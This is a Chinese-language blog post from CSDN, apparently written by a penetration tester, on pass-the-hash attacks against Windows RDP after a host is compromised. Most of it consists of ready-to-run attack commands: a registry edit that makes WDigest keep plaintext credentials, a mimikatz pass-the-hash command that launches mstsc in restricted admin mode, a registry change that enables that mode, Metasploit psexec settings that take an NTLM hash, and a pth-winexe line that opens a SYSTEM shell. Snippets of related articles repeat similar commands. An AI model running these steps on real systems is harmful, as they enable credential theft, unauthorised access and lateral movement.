后渗透之攻击RDP之利用凭据传递攻击(Path The Hash)

最新推荐文章于 2024-05-20 10:58:11 发布
最新推荐文章于 2024-05-20 10:58:11 发布
阅读量871 收藏 2
点赞数 1
分类专栏: WindowsOS 文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jietewang/article/details/119511843
版权

目录

1.直接利用 

2. 利用MSF工具PTH模块

2.1 psexec模块

2.2 kali集成的工具

在之前的文章中[后渗透之搞定RDP简析]介绍了关于Windows Server 2012之后的版本不存储明文密码。

但是依旧可以通过修改注册表和mimikatz来达到获取密文密码的目的

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

1.直接利用 

       根据上述的方法确实可以获取到目标主机的密码并且成功登录到主机,但这个操作的风险其实是很高的,在本人测试的时候成功关了客户一台主机并且挤掉了业务系统的开发人员,所以该操作的风险太高,就算是最大权限的渗透执行这类操作也极易被发现。

       微软为了防止在Windows Server 2012R2之后的版本被攻击者在系统内存中抓取明文密码,使用了安全措施,但是该安全措施却造成了RDP的pth攻击。详细内容可以参考这边文章[远程桌面服务:启用受限管理模式],在获取到系统用户hash后,利用工具进行登录远程桌面,需要在mimikatz执行如下命令

privilege::debug
sekurlsa::pth /user:administrator /domain:192.168.163.109 /ntlm:79a7d376cba88ef8bb072042b0d6e0eb "/run:mstsc.exe /restrictedadmin"

如果目标机器没有开启Restricted Admin mode,可以使用以下命令开启。

REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f 

2. 利用MSF工具PTH模块

2.1 psexec模块

使用模块

msf > use exploit/windows/smb/psexec
msf > set rhosts 192.168.163.109
msf > set SMBDomain WIN-JNPJJTM0FHT
msf > set SMBUser administrator
msf > set SMBPass 00000000000000000000000000000000:79a7d376cba88ef8bb072042b0d6e0eb
msf > run

2.2 kali集成的工具

 pth-winexe -U WIN-JNPJJTM0FHT/administrator%00000000000000000000000000000000:79a7d376cba88ef8bb072042b0d6e0eb --system --ostype=1 //192.168.163.109 cmd

本次使用的mimikatz是从GitHub上下载的2.2.0,俯下载链接如下:

https://download.csdn.net/download/Jietewang/20951692

本文参考文章:
https://mp.weixin.qq.com/s/mVSc5geSYwncpOda1OT-0g

Jietewang
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
赛斯(Seth):执行MitM攻击并从RDP连接中提取明文凭证
02-06
Seth是用Python和Bash编写的工具,它通过尝试降级连接以提取明文凭证来与MitM RDP连接。 开发它的目的是提高意识,并在透支测验,研讨会或讲座的背景下教育有关正确配置RDP连接的重要性。 作者是Adrian Vollmer(SyS...
PTH登陆RDP
Shanfenglan's blog
06-30 1655
修改注册表: REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin" #查询结果 利用过程 在本地计算机使用mimikatz登陆远程主机 privilege::debug se
【内网渗透】域横向RDP传递&Kerberoast攻击
ssrf
03-09 571
目录0x001 RDP协议传递0x002 Kerberoast攻击1)探针服务2)请求获取票据3)导出票据4)破解票据5)重写票据6)利用 0x001 RDP协议传递 除了之前的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。 RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断 RDP明文密码链接 windows: mstsc mstsc.exe /console /v:192.168.3.21 /admin linux:
渗透PTH横向攻击
最新发布
qq_55202378的博客
05-20 184
命令行也可以连接RDP,上述指令可能连不成功。直接连接肯定不行,因为没有凭据。输入IP就行,不用输入密码。前提:RDP明文连接过。
【湃哒星说安全】内网渗透技巧之RdpThief实践
PaidaxingSec的博客
11-22 680
在实际渗透过程中,各种口令凭据的窃取是一种美妙的艺术。而我们发现,登录 RDP 会话的凭据权限都比较高,除却通过 lsass.exe 来窃取口令外,RdpThief 应用而生。本文主要结合工具 CobaltStrike 以及 RdpThief 进行测试实验,以及些许原理的说明。
渗透之搞定RDP简析
Jietewang的博客
07-17 443
1.提取Windows Server 2012之后版本的登录密码 Windows服务器自2012始默认是不存储明文密码的,使用常规的渗透方法(mimikatz+procdump64.exe)是获取不到密码。但是这个问题能难倒我,怎么难得倒足智多谋的社会人呢? 需要修改注册表 reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t..
windows 后渗透攻击
weixin_30508309的博客
11-27 311
---恢复内容开始--- 从打开的meterpreter shell 打开 cmd 在cmd中运行wmic就可以得到系统相关信息 win10一些提权操作我都失败了 在win7中一下是我成功提权使用的模块 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protect...
渗透技巧_Pass_the_Hash_with_Remote_Desktop_Protocol1
08-03
渗透技巧_Pass_the_Hash_with_Remote_Desktop_Protocol1】这篇文章主要探讨了如何在渗透测试中利用NTLM哈希通过Remote Desktop Protocol (RDP)进行无密码登录的技术,即Pass the Hash攻击。这种方法在某些情况下比...
freerdp编译文件wfreerdp.exe
10-31
freerdp基于RDP协议,是一种专门用于远程桌面连接的协议。源码可以从github上下载,资源为编译后的exe文件,包含win32和win64 freerdp 常用参数说明: //远程电脑 wfreerdp.exe /u:用户名 /v:目标主机地址 //远程电脑...
windows7 64位 RDP升级到8.1补丁包
04-10
远程桌面协议(Remote Desktop Protocol,简称RDP)是Windows操作系统内置的一种远程控制协议,允许用户通过网络连接到另一台计算机并进行操作。在Windows 7 64位系统中,RDP版本可能较低,为了获得更好的性能和安全...
网安学习-内网渗透4
weixin_44770698的博客
08-01 797
网安学习-内网渗透4(仅仅记录整个内网渗透的思路和流程)
PTH(PASS THE HASH
qq_63527808的博客
01-21 892
2、NTLM 认证不使用明文口令,而是使用口令加密后的 hash 值,hash 值由系统 API 生成 3、hash 分为 LM hash 和 NT hash,如果密码长度大于15,那么无法生成 LM hash。6、微软也对 PTH 打过补丁,然而在测试中发现,在打了补丁后,常规的 PTH 已经无法成功,唯独默认的 Administrator(SID 500) 账号例外,利用这个账号仍可以进行 PTH 远程 ipc 连接。(2)可以获得 hash,但是条件不允许对 hash 爆破。
第5章域内横向移动分析及防御
nigo134的博客
05-19 753
域内横向移动投不定在夏杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁(Advanced Persistent Threats,APT中。攻击者会利用该技术,以被攻陷的系统为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。 通过此类攻击手段,攻击者最终可能获取域控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和与业务相关的关键账户。因此,必须使用强口令来保护特权用户不被用于横向移动攻击,从而避免域内其他
kali下利用FreeRDP进行hash登录远程桌面
crowsec
08-07 1595
在很多情况下,拿不到明文密码,由于对方机器是win2012的话,可以尝试使用hash登录RDP,看下桌面有什么东西。
内网渗透:四、windowsRDP-hash传递登录
liu_jia_liang的博客
02-21 4926
windows的RDP-hash登录利用渗透测试中,如果获得了某个用户的NTLM hash,我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录,对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下,如果使用hash远程登录RDP,需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。 一:windows RDP-受限管理模式 Restricted Admin mode简介 官方说明:Restric
内网渗透测试:获取远程桌面连接记录与 RDP 凭据
wangluoanquan111的博客
08-22 368
Windows 远程桌面是用于管理 Windows服务器的最广泛使用的工具之一。管理员喜欢使用远程桌面,攻击者也喜欢使用(狗头)。在之前的文章中我们已经介绍了很多攻击远程桌面的方法,本篇文章我们继续来探究。在渗透测试中,RDP远程桌面连接的历史记录不可忽视,根据历史连接记录我们往往能够定位出关键的服务器。并且,当我们发现了某台主机上存在远程桌面的连接记录,我们还可以想办法获取其远程桌面登录历史的连接凭据。用于登录RDP 远程桌面会话的凭据通常具有特权,这使它们成为红队操作期间的完美目标。
rdp连接工具_横向渗透之 [RDP]
weixin_39928940的博客
11-27 1461
重生信息安全T3ngYu一、RDP 服务确定和启动 1. 确定RDP服务是否启动和服务端口 (1)注册表查询REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启 REG QUERY "HKEY_LOCAL_MACH...
3389/rdp常用的漏洞利用方法
05-27
RDP(远程桌面协议)是一种用于Windows系统的远程管理工具,常用于远程控制服务器。以下是一些常用的RDP漏洞利用方法: 1. RDP弱口令攻击:黑客可以使用常见的用户名和密码组合来尝试登录RDP服务,例如administrator/admin、guest/guest等。如果目标服务器使用弱密码,则黑客可以轻松地登录并获取管理员权限。 2. RDP信息泄露:黑客可以通过RDP协议获取目标服务器的敏感信息,例如系统版本、用户信息等。这些信息可以帮助黑客更好地了解目标服务器的安全状况,从而进行更有效的攻击。 3. RDP缓冲区溢出攻击:黑客可以向目标服务器发送特制的RDP数据包,使其缓冲区溢出,从而执行恶意代码。 4. RDP DOS攻击:黑客可以向目标服务器发送大量的RDP请求,从而使其无法正常工作。 5. RDP中间人攻击:黑客可以通过欺骗用户或路由器来拦截和篡改RDP连接,从而获取用户的敏感信息。 请注意,这些漏洞利用方法都是非法的,不应该用于攻击他人的RDP服务器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值